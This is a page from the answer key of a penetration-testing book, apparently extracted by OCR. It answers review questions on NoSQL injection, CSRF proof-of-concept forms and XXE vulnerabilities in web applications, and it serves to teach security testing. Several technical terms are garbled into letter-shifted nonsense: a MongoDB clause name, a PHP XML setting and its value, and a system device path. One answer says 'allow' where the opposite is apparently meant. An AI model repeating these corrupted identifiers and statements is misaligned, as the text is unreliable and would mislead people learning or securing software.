Page 227 - Hands-On Bug Hunting for Penetration Testers
P. 227
Assessment
6. The XIFSF clause in MongoDB is particularly vulnerable to injection.
7. If you can induce some sort of noticable behavior in a web application (such as a
long delay), you can combine that with comparison logic to enumerate sensitive
information.
Chapter 6
1. CSRF stands for Cross Site Request Forgery and is when an attacker takes
advantage of a logged-in user's authenticated state to execute malicious
application requests and change the user's app in harmful ways.
2. An attacker with access to a CSRF vulnerability can trick a user into changing
application state against their will, or in a way they don't intend to (for example,
routing money to a different bank account).
3. A CSRF PoC is just the bare-bones markup necessary to recreate the form's HTTP
request.
4. If you can open a CSRF PoC in your browser and submit it successfully, that
validates the vulnerability.
5. Using BeautifulSoup to generate HTML lets you allow tedious string
manipulation (for example, splitting and inserting nested tags).
6. We used a CSRF POST-based attack in our E2E example.
7. A malicious actor would use more hidden fields, and allow his/her victim to
control less of the data sent to the server.
Chapter 7
1. An example misconfiguration for an XML parser susceptible to XXE in PHP is
not having the MJCYNM@EJTBCMF@FOUJUZ@MPBEFS variable set to USVF to
prevent entity expansion.
2. Using the Burp Proxy Intercept feature is key to submitting XML injection
snippets.
3. XXE vulnerabilities can allow for an attacker to expose sensitive files on the
server, DoS the application, or sometimes get RCE.
4. EFW SBOEPN is a special system location that acts as pseudorandom number
generator.
[ 212 ]
